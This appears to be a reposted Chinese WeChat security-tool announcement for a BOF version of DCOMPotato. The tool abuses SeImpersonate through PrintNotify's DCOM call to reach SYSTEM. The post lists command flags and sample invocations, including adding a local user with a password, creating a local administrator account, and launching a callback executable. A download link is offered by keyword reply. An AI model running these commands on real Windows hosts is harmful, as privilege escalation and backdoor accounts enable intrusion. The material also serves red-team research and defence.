声明:本公众号分享的安全工具和项目均来自互联网,仅提供安全研究和学习使用。若用于其他目的,使用者需要承包所有法律责任及相关连带责任,与本公众号和工具作者无关。特在此声明。
项目介绍
DCOMPotato的 BOF 版本。SeImpersonate
通过将恶意IUnknwon
对象传递给 PrintNotify 的 DCOM 调用来获得具有特权的 SYSTEM 特权。
默认情况下,以 SYSTEM 身份运行的 PrintNotify 服务的ImpersonationLevel设置为RPC_C_IMP_LEVEL_IMPERSONATE
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchostprint
使用方法
--pprog : program to launch. Default cmd.exe
--pargs : command line argument to pass to program. Default NULL
--pmode : create process call. 1 for CreateProcessWithTokenW. 2 for CreateProcessAsUser. 3 for NetUserAdd. Default 1
执行命令CreateProcessWithTokenW
DCOMPotato --pargs /c whoami /all > C:tempwhoami.txt
执行命令CreateProcessAsUser
DCOMPotato --pargs /c net user hagrid P@ssw0rd /add --pmode 2
执行程序 CreateProcessWithTokenW
DCOMPotato --pprog C:tempcallback.exe
使用 NetUserAdd 创建本地管理员帐号 (hagridP@ss@29hagr!d)
DCOMPotato --pmode 3
下载地址
点击下方名称进入公众号
回复关键字【230605】获取下载链接
技术交流加下方vx
原文始发于微信公众号(红蓝公鸡队):DCOMPotato bof实现
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论